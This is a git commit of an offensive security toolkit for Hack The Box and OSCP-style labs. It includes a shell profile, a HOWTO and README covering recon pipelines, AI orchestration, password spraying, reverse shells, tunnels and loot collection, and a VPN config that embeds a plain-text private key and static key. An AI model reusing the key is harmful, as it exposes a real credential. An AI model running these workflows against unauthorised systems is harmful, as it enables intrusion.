feat: bootstrap PentestPilot toolkit, docs, and orchestrators

Initial commit of PentestPilot — AI-assisted pentest recon and orchestration toolkit.

Highlights:
- Resumable pipelines (full_pipeline) with manifest state and elapsed timings
- Rich dashboard (colors, severity bars, durations, compact/json modes)
- Web helpers: httpx→nuclei auto, tech routing + quick scanners
- Agents: multi-task orchestrator (web/full/ad/notes/post) with resume
- AD/SMB, password utils, shells, transfer, privesc, tunnels
- QoL scripts: proxy toggle, cleanup, tmux init, URL extractor
- Docs: README (Quick Start + Docs Index), HOWTO (deep guide), TOOLKIT (catalog with examples)

Structure:
- bin/automation: pipelines, dashboard, manifest, resume, tech_actions
- bin/web: routing, scanners, helpers
- bin/ai: orchestrators + robust AI utils
- bin/ad, bin/passwords, bin/shells, bin/transfer, bin/privesc, bin/misc, bin/dns, bin/scan, bin/windows, bin/hashes
- HOWTO.md and TOOLKIT.md cross-linked with examples

Use:
- settarget <target>; agent full <domain|hosts.txt>; dashboard --compact
- See HOWTO.md for setup, semantics, and examples.
This commit is contained in:
PentestPilot Bot
2025-10-08 16:00:22 +02:00
commit 461c14d676
119 changed files with 4449 additions and 0 deletions

.DS_Store vendored Normal file

Binary file not shown.

.zshrc.htb Normal file

@@ -0,0 +1,108 @@
# HTB/OSCP helpers — source this from your ~/.zshrc
# Prompt (concise)
autoload -Uz colors && colors
PROMPT='%{$fg[green]%}%n%{$reset_color%}@%{$fg[cyan]%}%m%{$reset_color%}:%{$fg[yellow]%}%1~%{$reset_color%} %# '
# Options
setopt autocd correct no_flow_control hist_ignore_all_dups share_history
HISTSIZE=10000
SAVEHIST=10000
# Paths
export HTB_ROOT=${HTB_ROOT:-$PWD}
export PATH="$HTB_ROOT/bin:$HTB_ROOT/bin/enum:$HTB_ROOT/bin/web:$HTB_ROOT/bin/shells:$HTB_ROOT/bin/transfer:$HTB_ROOT/bin/crypto:$HTB_ROOT/bin/misc:$HTB_ROOT/bin/privesc:$HTB_ROOT/bin/automation:$HTB_ROOT/bin/ai:$HTB_ROOT/bin/ad:$HTB_ROOT/bin/passwords:$HTB_ROOT/bin/windows:$HTB_ROOT/bin/dns:$HTB_ROOT/bin/scan:$HTB_ROOT/bin/tunnel:$HTB_ROOT/bin/pwn:$HTB_ROOT/bin/hashes:$PATH"
# Aliases
alias ll='ls -lah'
alias ..='cd ..'
alias gg='rg -n --hidden --smart-case'
alias pserve='python3 -m http.server 8000'
alias l='ls -la'
# Target workflow
settarget() {
if [[ -z "$1" ]]; then echo "Usage: settarget <ip_or_host>" >&2; return 1; fi
export TARGET="$1"
mkdir -p "$HTB_ROOT/targets/$TARGET"/{scans,loot,www,exploits}
cd "$HTB_ROOT/targets/$TARGET" || return
export OUTDIR="$PWD/scans"
echo "[+] TARGET=$TARGET"
echo "[+] OUTDIR=$OUTDIR"
}
# Quick wrappers (require TARGET to be set)
alias nq='nmap_quick.sh "$TARGET"'
alias nf='nmap_full.sh "$TARGET"'
alias nu='nmap_udp.sh "$TARGET"'
alias snmp='snmp_enum.sh "$TARGET"'
alias smb='smb_enum.sh "$TARGET"'
alias ar='auto_recon.sh "$TARGET"'
# Quick web helpers
alias headers='http_headers.sh'
alias methods='methods.sh'
alias webrecon='web_recon.sh "$TARGET"'
alias wideweb='wide_web_recon.sh'
alias notesinit='notes_init.sh "$TARGET"'
alias notesattach='notes_attach.sh "$TARGET"'
# AI helpers
alias aiplan='commands_planner.py'
alias aireview='review_findings.py'
alias aiweb='orchestrate_web.py'
alias agent='agent_orchestrator.py'
alias fullpipe='full_pipeline.sh'
alias dashboard='dashboard.py'
alias resumeall='resume_all.py'
alias techactions='tech_actions.py'
alias proxyon='proxy_toggle.sh on'
alias proxyoff='proxy_toggle.sh off'
alias cleanupscans='cleanup_scans.sh'
# SMB helpers
alias e4l='enum4linux_ng.sh "$TARGET"'
alias smbmapq='smbmap_quick.sh "$TARGET"'
# DNS helpers
alias subenum='subenum.sh'
# IP helpers
ipmy() {
ip -br a 2>/dev/null | awk '$2=="UP"{print $1,$3}' || ifconfig 2>/dev/null
}
# Extract various archives: x <file>
x() {
if [[ -f "$1" ]]; then
case "$1" in
*.tar.bz2) tar xjf "$1" ;;
*.tar.gz) tar xzf "$1" ;;
*.bz2) bunzip2 "$1" ;;
*.rar) unrar x "$1" ;;
*.gz) gunzip "$1" ;;
*.tar) tar xf "$1" ;;
*.tbz2) tar xjf "$1" ;;
*.tgz) tar xzf "$1" ;;
*.zip) unzip "$1" ;;
*.7z) 7z x "$1" ;;
*) echo "don't know how to extract '$1'" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
# Quick notes helper (creates notes.md in target dir)
notes() {
[[ -z "${TARGET:-}" ]] && { echo "set TARGET first (settarget <ip>)" >&2; return 1; }
touch notes.md 2>/dev/null || true
${EDITOR:-vim} notes.md
}
# Convenience for proxying
export HTTP_PROXY=${HTTP_PROXY:-}
export HTTPS_PROXY=${HTTPS_PROXY:-}
# Done
echo "[+] Loaded .zshrc.htb (HTB_ROOT=$HTB_ROOT)"

HOWTO.md Normal file

@@ -0,0 +1,279 @@
PentestPilot — HOWTO
Table of Contents
- Overview — #overview
- Install & Setup — #install--setup
- Core Env Vars — #core-env-vars
- Target Workflow — #target-workflow
- Automation & Orchestration — #automation--orchestration
- Dashboard (Status & Evidence) — #dashboard-status--evidence
- Manifest (State & Resume) — #manifest-state--resume
- AI Integrations — #ai-integrations
- Web Recon & Routing — #web-recon--routing
- Active Directory & SMB — #active-directory--smb
- Passwords & Wordlists — #passwords--wordlists
- Shells, Transfers, Privesc — #shells-transfers-privesc
- Tunnels & Port Forwards — #tunnels--port-forwards
- QoL Utilities — #qol-utilities
- Post-Exploitation & Reporting — #post-exploitation--reporting
- Safety Notes — #safety-notes
- End-to-End Example — #end-to-end-example
- Troubleshooting — #troubleshooting
- Customization — #customization
- Appendix — Common Command Recipes — #appendix--common-command-recipes
Overview
- This toolkit streamlines OSCP/HTB workflows: discovery, web recon, AD, credential hygiene, shells, tunnels, transfers, privilege escalation, post-exploitation, reporting, and AI-assisted orchestration.
- Everything is CLI-first, idempotent when possible, and resume-aware via a per-target manifest.
- See: README.md:1 for the quick summary and TOOLKIT.md:1 for the command catalog.
- Tips and conventions below assume a Linux attacker VM (Kali/Parrot/Ubuntu). Adjust paths for your OS.
Install & Setup
1) Place the repo in your working directory (e.g., `~/hax/htb`).
2) Load the shell profile so aliases and PATH work:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
exec zsh
3) Optional AI setup:
- OpenAI: export OPENAI_API_KEY=sk-... (and optionally OPENAI_MODEL)
- Ollama: install+run, optionally export OLLAMA_MODEL=llama3.1 (default) and OLLAMA_HOST
Recommended Tools
- Install commonly used tools upfront (Debian/Ubuntu examples):
sudo apt update && sudo apt install -y nmap curl jq ripgrep python3 python3-pip tmux
sudo apt install -y gobuster seclists ffuf sqlmap
sudo apt install -y smbclient ldap-utils snmp snmp-mibs-downloader
pipx install httpx-toolkit nuclei gowitness || true
pipx runpip nuclei install -U nuclei || true
pipx install "impacket" || true
gem install wpscan || true
pipx install droopescan || true
sudo apt install -y joomscan || true
sudo snap install magescan || true
# optional: chisel, socat, naabu, masscan, subfinder/amass, crackmapexec
Notes:
- Some tools (httpx/nuclei) are provided by multiple packages; ensure they are in PATH.
- If a wrapper says a tool is missing, either install or skip that specific step.
- Use `pipx` (or venv) for Python-based tools to avoid site-packages collisions.
Core Env Vars
- `HTB_ROOT` (default: current repo path) — base for targets and scripts.
- `TARGET` — a current target convenience var set by `settarget`.
- `OUTDIR` — output directory for scans in the current target (set by `settarget`).
- Proxies: `HTTP_PROXY`/`HTTPS_PROXY` can be toggled via `proxy_toggle.sh on|off`.
Target Workflow
1) Create a target workspace:
settarget 10.10.10.10
This creates `targets/<target>/{scans,loot,www,exploits}` and sets `OUTDIR`.
2) Notes:
- `notesinit` scaffolds `notes.md` in the target directory.
- `notesattach` appends a scan artifacts summary to notes.
3) Directories:
- `targets/<target>/scans` — scanner logs, json, summaries
- `targets/<target>/loot` — collected artifacts
- `targets/<target>/notes.md` — your engagement notes
- `targets/<target>/manifest.json` — per-target state (see Manifest below)
4) Common recipes (see Appendix for more):
- Quick nmap: nq → review `scans/*_quick_*.nmap`
- Full TCP then service: nf → review `phase1`/`phase2` outputs
- UDP quick check: nu → review common UDP services
- Web checks: headers/methods/tech → dirbuster/param_fuzz → sqli_quick
- SMB/LDAP: smb_enum.sh / ldap_enum.sh — save listings in `scans/`
Quick Aliases
- Nmap: `nq` (quick), `nf` (full TCP), `nu` (UDP top)
- Web: `webrecon` (current TARGET), `wideweb <hosts.txt>` (lists)
- Full pipeline: `fullpipe <domain|hosts.txt>` (DNS→httpx→nuclei→tech route, resume-aware)
- AI agents: `agent` (multi-task), `aiweb`, `aiplan`, `aireview`
- Dashboard: `dashboard` (status), `resumeall`, `techactions`
- QoL: `proxyon`, `proxyoff`, `cleanupscans`, `tmux_init.sh`
Automation & Orchestration
- Minimal recon: `auto_recon.sh <target>`
- Web recon (current TARGET): `web_recon.sh <target|--url URL>` → headers/tech/backup/dirb (+screenshots if `gowitness`)
- Wide recon (list of hosts): `wide_web_recon.sh <hosts.txt>` → httpx + nuclei + screenshots
- One-click pipeline: `full_pipeline.sh <domain|hosts.txt> [--resume|--force]`
- DNS subenum (if domain) → httpx (balanced) → nuclei (auto severity) → tech route → optional WPScan
- Resume (default) consults `manifest.json` and skips completed steps.
- Writes evidence JSON + summaries (httpx/nuclei) into OUTDIR and manifest.
- Agents (AI-aware): `bin/ai/agent_orchestrator.py:1`
- `agent full <domain|hosts.txt>` — small state machine for the full pipeline; retries resume passes, then runs `tech_actions.py --run`.
- `agent web <hosts.txt> [--force]` — httpx → nuclei → screenshots → AI plan (resume-aware subtasks)
- `agent ad <host> [--force]` — enum4linux/smbmap/rpc (resume-aware)
- `agent notes <target> [--force]` — notes init + attach (resume-aware)
- `agent post <target> [--force]` — linux_loot + report pack (resume-aware)
- Resume all targets: `resume_all.py` — loops over targets/* and resumes incomplete `full_pipeline` runs.
Advanced: Pipeline Semantics
- `--resume` (default) skips steps whose manifest task status is `ok`.
- `--force` reruns steps and overwrites evidence (new timestamps/files).
- Each phase records elapsed seconds and evidence file paths in manifest meta.
- If a run fails midway, you can reinvoke with `--resume` to continue where you left off.
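In Python terms, the resume check amounts to reading a task's status out of `manifest.json`; a minimal sketch (the `should_skip` helper is illustrative, not part of the toolkit):

```python
import json
from pathlib import Path

def should_skip(manifest_path, task):
    """Resume semantics sketch: a step is skipped only when its manifest
    task status is 'ok'; a missing or broken manifest means run everything."""
    try:
        data = json.loads(Path(manifest_path).read_text())
    except (FileNotFoundError, json.JSONDecodeError):
        return False
    return data.get("tasks", {}).get(task, {}).get("status") == "ok"
```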
Dashboard (Status & Evidence)
- Command: `dashboard`. Options: `--no-color`, `--compact`, `--json`
- Columns:
- target, created, last (timestamp of last pipeline), urls (count)
- dns, httpx, nuclei, tech, wp — per-phase status with elapsed seconds
- sev — severity counts (e.g., c:1 h:3 m:2)
- toptechs — top techs from httpx tech summary (e.g., wordpress:3, drupal:1)
- bar — colorized severity proportion bar (critical/high/medium/low)
- Evidence sources (auto-persisted by pipeline):
- httpx JSON: `OUTDIR/httpx_<ts>.json` and `httpx_<ts>.summary.json`
- nuclei JSON: `OUTDIR/httpx2nuclei_<ts>/nuclei.json` and `summary.json`
Manifest (State & Resume)
- Path: `targets/<target>/manifest.json`
- Schema (high-level):
{
"target": "<name>",
"created_at": "YYYY-MM-DD HH:MM:SS",
"last_pipeline": "<ts>",
"urls": [ ... ],
"tasks": {
"dns": {"status":"ok|running|fail","started_at":"...","finished_at":"...","meta":{"subs_file":"...","elapsed_sec":N}},
"httpx": {"meta":{"urls_file":"...","httpx_json":"...","httpx_summary":"...","elapsed_sec":N}},
"nuclei": {"meta":{"log":"...","nuclei_json":"...","nuclei_summary":"...","elapsed_sec":N}},
"techroute": {"meta":{"log":"...","elapsed_sec":N}},
"wpscan": {"meta":{"log":"...","elapsed_sec":N}},
"web_httpx|web_nuclei|web_shots|web_plan": {"meta":{"elapsed_sec":N}},
"ad_*", "notes_*", "post_*": {"meta":{"elapsed_sec":N}}
}
}
- CLI: `bin/automation/manifest.py:1`
- `init <target>` — create manifest
- `set|get <target> <key> [value]` — set or read top-level values
- `addlist <target> <key> <file|a,b,c>` — append to a list
- `show <target>` — print JSON
- `task <target> <name> start|ok|fail [meta-json]` — update tasks (status, timestamps, meta)
- `taskstatus <target> <name>` — prints status; exit 0 if ok, 2 if running, 1 otherwise
- `taskreset <target> <name>` — remove/reset a task entry
AI Integrations
- Providers: OpenAI (OPENAI_API_KEY) or local Ollama (defaults chosen automatically).
- Robust helpers: `bin/ai/_ai_utils.py:1` (retries, timeouts, prompt truncation)
- Tools:
- `ask.py` — quick prompts
- `commands_planner.py` — converts a goal/context into ready-to-run toolkit commands
- `orchestrate_web.py` — probes (httpx) and asks AI for a recon plan
- `review_findings.py` — summarizes notes into risks + next steps
- `agent_orchestrator.py` — orchestrates web/full/ad/notes/post tasks and updates manifest
Troubleshooting AI:
- If calls fail, `_ai_utils.py` retries with exponential backoff.
- If no OPENAI_API_KEY is set, the system falls back to Ollama (ensure it's running).
- You can reduce output size by keeping prompts small and by using `--compact` when calling the dashboard.
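The retry behavior can be pictured as a standard backoff loop. The sketch below illustrates the pattern only; `with_retries` is not the actual `_ai_utils.py` API:

```python
import random
import time

def with_retries(fn, attempts=4, base=1.0, cap=30.0, sleep=time.sleep):
    """Retry fn() with exponential backoff and jitter (illustrative sketch;
    names and defaults here are assumptions, not the toolkit's interface)."""
    for i in range(attempts):
        try:
            return fn()
        except Exception:
            if i == attempts - 1:
                raise  # out of attempts: surface the last error
            # exponential delay, capped, with jitter to avoid thundering herds
            sleep(min(cap, base * 2 ** i) * random.uniform(0.5, 1.0))
```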
Web Recon & Routing
- Pipeline: `httpx_to_nuclei.sh` → httpx alive list → nuclei with auto severity (based on URL count) → produces `.txt`, `.json`, `summary.json`.
- Tech routing: `httpx_tech_route.py` flags:
- `--tech` filter; `--severity` list; `--wpscan [--wpscan-limit N]`; `--extra [--extra-limit N]`; `--dry-run`
- Presets: wordpress, drupal, joomla, laravel, aspnet, spring, tomcat, iis, exchange, sharepoint, grafana, kibana, gitlab, confluence, jupyter, jenkins, magento, sonarqube, jira
- With `--extra`, auto-runs quick wrappers when present (e.g., WPScan, Droopescan, Joomscan, Jenkins/SonarQube/Magento/Jira/Confluence quick checks)
- Extras:
- `httpx_presets.sh`: concurrency profiles; `httpx_probe.sh` for fast probes
- `gobuster_dir.sh`, `gobuster_vhost.sh`; `dirbuster.sh` (ffuf); backup hunters, CORS/methods/TLS, LFI tester
Active Directory & SMB
- Impacket wrappers: `getnpusers_wrapper.sh`, `getspns_wrapper.sh`
- `kerbrute_wrapper.sh` (user enum), `cme_quick.sh` (shares/sessions/loggedon), `rpc_quick.sh`
- SMB `smbmap_quick.sh` and `smb_check_write.sh`
Passwords & Wordlists
- `mutate_words.py`, `merge_dedupe.sh`, `wordlist_cleanup.sh` — build/clean wordlists
- `spray_http_basic.sh` — cautious HTTP Basic Auth spray (respect lockout policies)
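As a rough illustration of what a word mutator does (the actual rules in `mutate_words.py` may differ), a minimal sketch:

```python
def mutate(word):
    """Generate common password variants from a base word: case changes,
    leetspeak substitutions, and numeric/symbol suffixes (illustrative only)."""
    leet = str.maketrans({"a": "4", "e": "3", "o": "0", "s": "5"})
    base = {word, word.capitalize(), word.upper(), word.translate(leet)}
    suffixed = {v + s for v in base for s in ("1", "123", "!")}
    return sorted(base | suffixed)
```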
Shells, Transfers, Privesc
- Shells: reverse one-liners (`revsh.py`), listener (`listener.sh`), TTY upgrade tips
- Transfers: `http_serve.sh` or `serve.py` (with web upload), `smb_server.sh`, `dl_oneshots.sh`, `push_http.sh`
- Linux privesc: `linux_quick_enum.sh`, `suid_scan.sh`, `caps_scan.sh`
- Windows privesc: `privesc_quick.ps1`, `find_unquoted_services.ps1`, `find_path_writable.ps1`, `win_share_enum.ps1`
Tunnels & Port Forwards
- `chisel_server.sh` / `chisel_client.sh` — reverse tunnels
- `autossh_socks.sh` — resilient SOCKS proxy
- `socat_forward.sh` and `port_forward.sh` — local/remote forwards
QoL Utilities
- `cleanup_scans.sh` — prune old scan files
- `proxy_toggle.sh` — set/unset HTTP(S) proxy env vars
- `tmux_init.sh` — quick tmux workspace
- `extract_urls.py` — harvest URLs from files (logs/notes)
Post-Exploitation & Reporting
- `linux_loot.sh` — safe, size-capped artifacts collector (config via env: `MAX_SIZE`, `INCLUDE_*`)
- `windows_loot.ps1` — conservative Windows loot collector (zip fallback)
- `pack_report.sh` — compiles a markdown with summaries and file listings
Safety Notes
- Use only with explicit authorization.
- Many steps are safe by default (no brute force). Be mindful of account lockout policies when using auth-related tooling.
- For “unsafe” or exploit-heavy checks, consider separate gated wrappers and explicit flags.
End-to-End Example
1) Set up target and notes:
settarget target.htb
notesinit
2) Run full autonomous recon (resume-aware):
agent full target.htb
3) Review dashboard:
dashboard --compact
4) Let AI suggest next steps from tech:
techactions $TARGET
5) Post-exploitation:
agent post $TARGET
6) Resume across multiple targets later:
resumeall
Troubleshooting
- Tool missing: wrappers fail gracefully and log hints. Install optional tools (httpx, nuclei, gobuster, gowitness, wpscan, droopescan, joomscan, magescan, impacket).
- Manifest stuck in running: `manifest.py taskreset <target> <name>`.
- No colors in dashboard: your terminal may not support ANSI; force plain output with `--no-color`.
Customization
- Adjust tags/severity in `httpx_to_nuclei.sh:1` and `httpx_tech_route.py:1`.
- Extend tech presets and quick wrappers in `bin/web/`.
- Tweak agent behaviors in `bin/ai/agent_orchestrator.py:1`.
- Add your own manifest keys via `manifest.py set <target> key value` for custom dashboards.
Appendix — Common Command Recipes
- Directory brute (gobuster): gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
- Vhost brute: gobuster_vhost.sh http://$TARGET/ subdomains-top1million-5000.txt 100
- Probe techs: httpx_probe.sh hosts.txt > live.txt
- Route by tech (with extras): httpx_tech_route.py live.txt --tech wordpress,drupal --extra --wpscan
- Nuclei quick: nuclei_quick.sh live.txt cves,exposures
- SMB write check: smb_check_write.sh $TARGET sharename
- LDAP quick users: ldap_quick_users.sh $TARGET 'DC=target,DC=htb'
- Secrets scan: scan_secrets.sh .
Legend:
- DNS/httpx/nuclei/tech/wp: status + elapsed time `(OK(12s))`.
- sev: short counts (`c:2 h:3 m:5`), bar: █ blocks colored per severity.
- --compact removes dates and shows essentials when terminal space is tight.
- --json lets you script your own dashboards.
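For example, a small script consuming `--json` output might format a severity cell. Note the field names (`target`, `sev`) are assumptions about the JSON shape, not a documented schema:

```python
import json

def sev_cell(row):
    """Format a severity cell like the dashboard's `c:1 h:3 m:2` column,
    skipping zero counts. Field names are assumed, not a spec."""
    sev = row.get("sev", {})
    parts = [(k[0], sev.get(k, 0)) for k in ("critical", "high", "medium", "low")]
    return " ".join(f"{letter}:{n}" for letter, n in parts if n)

rows = json.loads('[{"target": "target.htb", "sev": {"critical": 1, "high": 3}}]')
print(rows[0]["target"], sev_cell(rows[0]))  # target.htb c:1 h:3
```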
Example manifest snippet:
{
"target": "target.htb",
"tasks": {
"httpx": {
"status": "ok",
"started_at": "2025-10-08 10:21:00",
"finished_at": "2025-10-08 10:21:08",
"meta": {
"urls": 34,
"urls_file": "targets/target.htb/scans/urls_20251008_1021.txt",
"httpx_json": ".../httpx_20251008_1021.json",
"httpx_summary": ".../httpx_20251008_1021.summary.json",
"elapsed_sec": 8
}
}
}
}
Customizing Tech Routes:
- Edit `httpx_tech_route.py` to add or adjust presets in the `presets` map.
- To auto-launch additional quick wrappers, update the `--extra` handler.
Auto Severity Tuning (nuclei):
- `httpx_to_nuclei.sh` sets nuclei severity via `--severity auto` mapping:
- >500 URLs → `high,critical`; >100 → `medium,high,critical`; else `low,medium,high,critical`.
- Override with explicit `--severity` or adjust logic in the script.
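The mapping above, written out as a standalone sketch (`httpx_to_nuclei.sh` implements it in shell; this helper name is illustrative):

```python
def auto_severity(url_count):
    """Pick a nuclei severity list from the number of alive URLs:
    large scopes get only the noisiest findings, small scopes get everything."""
    if url_count > 500:
        return "high,critical"
    if url_count > 100:
        return "medium,high,critical"
    return "low,medium,high,critical"
```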

HTB.ovpn Normal file

@@ -0,0 +1,87 @@
client
dev tun
proto tcp
remote edge-eu-free-2.hackthebox.eu 443
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
verb 3
data-ciphers-fallback AES-128-CBC
data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
tls-cipher "DEFAULT:@SECLEVEL=0"
auth SHA256
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
MIICDjCCAcCgAwIBAgIQAY7iX+I6dfaVWaMJXidIRTAFBgMrZXAwZDELMAkGA1UE
BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs
MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcN
MjQwNDE1MTUyODM4WhcNMzQwNDE1MTUyODM4WjBeMQswCQYDVQQGEwJHUjEVMBMG
A1UEChMMSGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMSYwJAYDVQQDEx1I
VEIgVlBOOiBldS1mcmVlLTIgSXNzdWluZyBDQTAqMAUGAytlcAMhANRtLwPdgQ/j
oGEo7GTBqm6rNN83vgRsVqMf9cP83KlMo4GNMIGKMA4GA1UdDwEB/wQEAwIBhjAn
BgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8GA1UdEwEB
/wQFMAMBAf8wHQYDVR0OBBYEFD2YUNtsvUD2ynIAtfr1Uk1NjYz8MB8GA1UdIwQY
MBaAFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUGAytlcANBAKYH1gYc72heLF8mu2vo
8FAcozEtFv+2g1OFvahcSoPrn7kbUcq8ebGb+o6wbgrVm8P/Y/c3h5bmnw5y8V3t
9gw=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIB8zCCAaWgAwIBAgIQAY7Mx8YFd9iyZFCrz3LiKDAFBgMrZXAwZDELMAkGA1UE
BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs
MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwIBcN
MjQwNDExMTA1MDI4WhgPMjA1NDA0MTExMDUwMjhaMGQxCzAJBgNVBAYTAkdSMRUw
EwYDVQQKEwxIYWNrIFRoZSBCb3gxEDAOBgNVBAsTB1N5c3RlbXMxLDAqBgNVBAMT
I0hUQiBWUE46IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MCowBQYDK2VwAyEA
FLTHpDxXnmG/Xr8aBevajroVu8dkckNnHeadSRza9CCjazBpMA4GA1UdDwEB/wQE
AwIBhjAnBgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8G
A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUG
AytlcANBABl68VB0oo0rSGZWt6L+LNMnyHEJl+CQ+FTjQfzE6oqEMAvJTzdjMyeG
OOUNlQYwGRVajOauFa/IMvDsTBXOgw8=
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
MIIBxjCCAXigAwIBAgIQAZQTnGxLc3eYzWO9SnM9sjAFBgMrZXAwXjELMAkGA1UE
BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEm
MCQGA1UEAxMdSFRCIFZQTjogZXUtZnJlZS0yIElzc3VpbmcgQ0EwHhcNMjQxMjI5
MTgxMDA2WhcNMzQxMjI5MTgxMDA2WjBKMQswCQYDVQQGEwJHUjEVMBMGA1UEChMM
SGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMRIwEAYDVQQDEwltcC0yNzQ1
NjQwKjAFBgMrZXADIQDiwraGYtEpx63P6AMDQgczmsx4WO9iVPGTkVRRkyHrmqNg
MF4wDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
ATAMBgNVHRMBAf8EAjAAMB8GA1UdIwQYMBaAFD2YUNtsvUD2ynIAtfr1Uk1NjYz8
MAUGAytlcANBANAkGgddoR9WIbfv3C8gIPx6ivEyq1Tlo354JG/y+lv015bOjrmy
aL7cF4ILRaPTbxWeBfVeVQOwLrz4rCBwsg0=
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
MC4CAQAwBQYDK2VwBCIEIAA2VTVH7CjQQECTQGg/FAy+5uJ6fGSRN5vAbeK3qawi
-----END PRIVATE KEY-----
</key>
<tls-crypt>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
85341e27fb3510f97f3455db449ea6c4
bf6b87e90802ced4c36feaa162ddd218
9df22b9895d5770fd942b745b8d5532b
716fa58ac45e0f59b589ae1bc7ad11c7
633c0c811b2ff682a35da172f6b32452
410c971b8d422502aa012a37422d63bc
8ce669f3f1ded38144e3df1d0b689ae3
5fa92a5f23600fba10da3ce71163e128
bbac0bc5a922c16f3803f9dc36be960a
6cb371df43583fef525aa529ef2615b9
95d7acd479cf90eada71684bec3c70e3
2f2d25a66732544c5bc5f225d01940b7
b66cf57327a3331ec7550e915bdc68a9
4949a88a101f2d3383268fd32ffece1d
7d8d62d679707ae0c4d36a582b4a2a8f
24ee9da8eefa18339cd8d6425dceef89
-----END OpenVPN Static key V1-----
</tls-crypt>

README.md Normal file

@@ -0,0 +1,82 @@
PentestPilot
- Overview
- Script-driven toolkit to accelerate common OSCP/HTB workflows: discovery, web recon, AD, password hygiene, shells, tunnels, transfers, privilege escalation, post-exploitation, reporting.
- AI agents and orchestrators automate reconnaissance and organize results. Works with OpenAI (OPENAI_API_KEY) or local Ollama.
- New? Start with HOWTO.md:1 for step-by-step usage, dashboard details, and resumable pipelines.
Quick Start (Dashboard in ~3-5 minutes)
- Clone/open the repo and load the shell profile:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc && exec zsh
- Minimal deps (Debian/Ubuntu):
sudo apt update && sudo apt install -y nmap curl jq ripgrep python3 tmux
pipx install httpx-toolkit nuclei gowitness || true
- Create a target workspace: settarget target.htb
- Kick off one-click recon (resume-aware): agent full target.htb
- Watch progress: dashboard --compact (add --no-color if needed)
- Resume many later: resumeall (resumes incomplete pipelines for all targets)
See HOWTO.md:1 for details, alternatives, and troubleshooting.
AI Setup
- OpenAI: export OPENAI_API_KEY=sk...
- Ollama: install and run ollama; optionally export OLLAMA_MODEL=llama3.1
- Test: ask.py "You online?"
Key Commands (aliases)
- nq | nf | nu → nmap quick/full/udp
- webrecon → focused web recon on detected web ports
- wideweb <hosts.txt> → httpx + screenshots + nuclei
- fullpipe <domain|hosts.txt> → chain DNS→httpx→nuclei→tech route (+WPScan)
- notesinit / notesattach → notes scaffolding
- agent <task> → multi-agent runner (web|full|notes|post|ad)
AI Orchestration
- bin/ai/agent_orchestrator.py
- agent web hosts.txt → httpx→nuclei→screenshots→AI plan (resume-aware; use --force to rerun)
- agent full domain.tld → run full pipeline
- agent notes $TARGET → init + attach notes
- agent post $TARGET → linux_loot + report pack (resume-aware)
- agent ad $TARGET → enum4linux-ng + smbmap + rpcclient
- Robust completion utils: bin/ai/_ai_utils.py (retries, provider fallback)
- Planning/Review tools: commands_planner.py, orchestrate_web.py, review_findings.py
State & Resume
- Target manifest at targets/<target>/manifest.json
- Manage via bin/automation/manifest.py
- init, set, get, addlist, show, task <name> start|ok|fail [meta], taskstatus, taskreset
- Pipelines update tasks with timestamps and metadata (dns, httpx, nuclei, techroute, wpscan, full_pipeline). Agents add web_* (httpx/nuclei/screenshots/plan), notes_* and post_* tasks, and ad_* tasks.
Features at a Glance
- Resumable pipelines (agent full, resumeall) and color dashboard with severity bars + per-phase durations
- Evidence-first storage (httpx/nuclei JSON + summaries) to drive next actions
- Tech-aware routing (WP/Drupal/Joomla/Jenkins/SonarQube/Magento/Jira/Confluence)
- AI helpers for planning and findings review (OpenAI or Ollama)
- QoL utilities: proxies, cleanup, tmux bootstrap, URL extraction
Dependencies
- Recommended: nmap, ffuf, httpx, nuclei, gobuster, gowitness, subfinder|amass, sqlmap, wpscan, droopescan, joomscan, magescan, impacket, ldap-utils, snmp, ripgrep, jq, python3 requests, socat, chisel
Documentation
- HOWTO.md:1 — in-depth “how to” with recommended tools, pipeline semantics, dashboard legend, manifest schema, and examples.
- TOOLKIT.md:1 — command catalog grouped by category with references back to HOWTO.
Docs Index (quick links)
- HOWTO: Overview — HOWTO.md#overview
- Install & Setup — HOWTO.md#install--setup
- Core Env Vars — HOWTO.md#core-env-vars
- Target Workflow — HOWTO.md#target-workflow
- Automation & Orchestration — HOWTO.md#automation--orchestration
- Dashboard (Status & Evidence) — HOWTO.md#dashboard-status--evidence
- Manifest (State & Resume) — HOWTO.md#manifest-state--resume
- AI Integrations — HOWTO.md#ai-integrations
- Web Recon & Routing — HOWTO.md#web-recon--routing
- Active Directory & SMB — HOWTO.md#active-directory--smb
- Passwords & Wordlists — HOWTO.md#passwords--wordlists
- Shells, Transfers, Privesc — HOWTO.md#shells-transfers-privesc
- Tunnels & Port Forwards — HOWTO.md#tunnels--port-forwards
- QoL Utilities — HOWTO.md#qol-utilities
